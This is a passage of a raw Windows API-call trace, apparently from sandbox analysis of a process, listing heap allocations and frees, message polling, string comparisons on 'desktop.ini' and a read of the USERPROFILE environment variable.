lpString1="top.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0215.643] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0215.643] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0215.643] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0215.643] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0215.643] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0215.643] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0215.643] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0215.643] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0215.643] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0215.643] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e8c0 [0215.643] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0215.643] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0215.643] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0215.643] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0215.643] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0215.643] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0215.643] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0215.643] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0215.643] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0215.643] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0215.644] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0215.644] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0215.644] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0215.644] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0215.644] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0215.644] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0215.644] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0215.644] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0215.644] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72368 [0215.644] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7080 [0215.644] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0215.644] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="desktop.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0215.644] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esktop.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0215.644] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sktop.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0215.644] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ktop.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0215.644] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="top.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0215.644] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0215.644] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0215.644] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0215.644] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0215.644] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ee0 | out: hHeap=0x2af0000) returned 1 [0215.644] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0215.644] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0215.644] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0215.644] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0215.644] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0215.644] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf48 | out: hHeap=0x2af0000) returned 1 [0215.645] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae40 | out: hHeap=0x2af0000) returned 1 [0215.645] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0215.645] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0215.645] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77aa8 | out: hHeap=0x2af0000) returned 1 [0215.645] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0215.645] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0215.645] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0215.645] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0215.645] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0215.645] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0215.645] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0215.645] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0215.645] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b70 | out: hHeap=0x2af0000) returned 1 [0215.645] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0215.645] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0215.645] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b08 [0215.645] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0215.645] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0215.645] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0215.645] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0215.645] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0215.645] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0215.645] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0215.645] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0215.645] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0215.645] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b78 [0215.645] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0215.645] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0215.646] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0215.646] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab008 [0215.646] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0215.646] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0215.646] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaae88 [0215.646] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0215.646] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0215.646] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0215.646] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0215.646] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b18 [0215.646] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0215.646] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0215.646] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0215.646] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0215.646] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab008 | out: hHeap=0x2af0000) returned 1 [0215.646] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0215.646] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf48 | out: hHeap=0x2af0000) returned 1 [0215.646] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0215.646] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0215.646] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaff0 | out: hHeap=0x2af0000) returned 1 [0215.646] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0215.646] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7120 [0215.646] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0215.646] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x3854b78 [0215.646] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77be8 | out: hHeap=0x2af0000) returned 1 [0215.647] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0215.647] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0215.647] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0215.647] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0215.647] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0215.647] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0215.647] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0215.647] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7120 | out: hHeap=0x2af0000) returned 1 [0215.647] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0215.647] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0215.647] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a08 [0215.647] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0215.647] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0215.647] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0215.647] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0215.647] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0215.647] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0215.647] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0215.647] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0215.647] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a78 [0215.647] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0215.647] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0215.647] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0215.647] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaea0 [0215.647] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0215.648] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0215.648] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab128 [0215.648] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0215.648] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0215.648] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0215.648] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0215.648] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0215.648] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0215.651] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0215.651] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0215.651] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0215.652] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0215.652] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0215.652] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0215.652] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0215.652] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0215.652] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0215.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0215.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f71e0 [0215.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0215.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x3854650 [0215.652] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77dc8 | out: hHeap=0x2af0000) returned 1 [0215.652] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0215.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0215.652] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0215.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0215.652] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0215.652] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71e0 | out: hHeap=0x2af0000) returned 1 [0215.652] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0215.652] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0215.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a719d8 [0215.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0215.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0215.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0215.652] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0215.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a719e8 [0215.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0215.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0215.653] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0215.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab0c8 [0215.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0215.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0215.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0215.653] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0215.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0215.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0215.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0215.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0215.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0215.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0215.653] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0215.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0215.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0215.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0215.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0215.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0215.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0215.653] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0215.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0215.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0215.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0215.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0215.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0215.654] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0215.654] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0215.654] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0215.654] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0215.654] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0215.654] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.654] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0215.654] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0215.654] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0b0 [0215.654] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0215.654] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0215.654] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0215.654] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0215.654] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0215.654] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0215.654] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0215.654] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b98 | out: hHeap=0x2af0000) returned 1 [0215.654] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0215.654] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0215.654] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0215.654] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0b0 | out: hHeap=0x2af0000) returned 1 [0215.654] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0215.654] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0215.654] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0215.654] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.655] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0215.655] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0215.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0215.655] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0215.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0215.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0215.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0b0 [0215.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a18 [0215.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0215.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0215.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0215.655] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0215.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0215.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0215.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0215.655] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0215.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0215.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0215.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a28 [0215.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0215.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0215.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a38 [0215.655] HeapFree (in: 